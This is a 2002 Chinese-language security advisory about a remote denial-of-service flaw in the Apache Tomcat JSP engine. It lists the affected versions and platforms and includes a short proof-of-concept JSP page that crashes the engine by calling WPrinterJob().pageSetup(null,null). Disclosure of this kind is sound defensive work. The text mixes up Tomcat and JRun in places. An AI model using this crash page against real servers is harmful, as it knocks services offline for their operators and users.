|
|
Apache Tomcat JSP引擎存在拒绝服务攻击
发布时间:2002-06-15
更新时间:2002-06-15
严重程度:中
威胁程度:远程拒绝服务
错误类型:意外情况处置错误
利用方式:客户机模式
BUGTRAQ ID:4995
受影响系统Apache Software Foundation Tomcat 3.2
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.1
- Debian Linux 2.2
- Digital UNIX 4.0
- FreeBSD FreeBSD 4.0
- FreeBSD FreeBSD 5.0
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 7.1
- NetBSD NetBSD 1.4.1 x86
- NetBSD NetBSD 1.4.2 x86
- RedHat Linux 6.1 i386
- RedHat Linux 6.2 i386
- SGI IRIX 6.4
- SGI IRIX 6.5
- Sun Solaris 7.0
- Sun Solaris 8.0
Apache Software Foundation Tomcat 3.2.1
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.1
- Debian Linux 2.2
- Digital UNIX 4.0
- FreeBSD FreeBSD 4.0
- FreeBSD FreeBSD 5.0
- HP Secure OS software for Linux 1.0
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 7.1
- NetBSD NetBSD 1.4.1 x86
- NetBSD NetBSD 1.4.2 x86
- RedHat Linux 6.1 i386
- RedHat Linux 6.2 i386
- SGI IRIX 6.4
- SGI IRIX 6.5
- Sun Solaris 7.0
- Sun Solaris 8.0
Apache Software Foundation Tomcat 3.3
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.1
- Debian Linux 2.2
- Digital UNIX 4.0
- FreeBSD FreeBSD 4.0
- FreeBSD FreeBSD 5.0
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 7.1
- NetBSD NetBSD 1.4.1 x86
- NetBSD NetBSD 1.4.2 x86
- RedHat Linux 6.1 i386
- RedHat Linux 6.2 i386
- SGI IRIX 6.4
- SGI IRIX 6.5
- Sun Solaris 7.0
- Sun Solaris 8.0
Apache Software Foundation Tomcat 3.3.1
Apache Software Foundation Tomcat 4.0
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.1
- Debian Linux 2.2
- Digital UNIX 4.0
- FreeBSD FreeBSD 4.0
- FreeBSD FreeBSD 5.0
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 7.1
- NetBSD NetBSD 1.4.1 x86
- NetBSD NetBSD 1.4.2 x86
- RedHat Linux 6.1 i386
- RedHat Linux 6.2 i386
- SGI IRIX 6.4
- SGI IRIX 6.5
- Sun Solaris 7.0
- Sun Solaris 8.0
Apache Software Foundation Tomcat 4.0.1
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.1
- Debian Linux 2.2
- Digital UNIX 4.0
- FreeBSD FreeBSD 4.0
- FreeBSD FreeBSD 5.0
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 7.1
- NetBSD NetBSD 1.4.1 x86
- NetBSD NetBSD 1.4.2 x86
- RedHat Linux 6.1 i386
- RedHat Linux 6.2 i386
- SGI IRIX 3.3
- SGI IRIX 6.4
- SGI IRIX 6.5
- Sun Solaris 7.0
- Sun Solaris 8.0
Apache Software Foundation Tomcat 4.0.2
Apache Software Foundation Tomcat 4.0.3
Apache Software Foundation Tomcat 4.1
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.1
- Debian Linux 2.2
- Debian Linux 2.3
- Digital UNIX 4.0
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 5.0
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 7.1
- NetBSD NetBSD 1.4.1 x86
- NetBSD NetBSD 1.4.2 x86
- RedHat Linux 6.1 i386
- RedHat Linux 6.2 i386
- SGI IRIX 3.3
- SGI IRIX 6.4
- SGI IRIX 6.5
- Sun Solaris 7.0
- Sun Solaris 8.0 详细描述
Apache Tomcat for Windows存在一个拒绝服务攻击漏洞,当Tomcat处理畸形JSP页面时,可使RUN崩溃。
当处理如下代码时可导致JRUN JSP引擎崩溃:
new WPrinterJob().pageSetup(null,null);
>
测试代码
Apache Tomcat for Windows存在一个拒绝服务攻击漏洞,当Tomcat处理畸形JSP页面时,可使RUN崩溃。
当处理如下代码时可导致JRUN JSP引擎崩溃:
new WPrinterJob().pageSetup(null,null);
<%@ page contentType="text/html;charset=UTF-8" pageEncoding="iso-8859-1"
%>
<%@ page import="sun.awt.windows.*" %>
<%! %>
<%
//
%>
<html>
<head>
<title>aa</title>
</head>
<body>
<p>
<FONT SIZE="+2">dON/T TR1 thiz @ home</font>
</p>
<%
new WPrinterJob().pageSetup(null,null);
%>
</body>
</html>
解决方案
尚无
相关信息
Marc Schoenefeld <marc.schoenefeld@uni-muenster.de>.
参考:http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0095.html
相关主页:http://jakarta.apache.org/tomcat/index.html
|
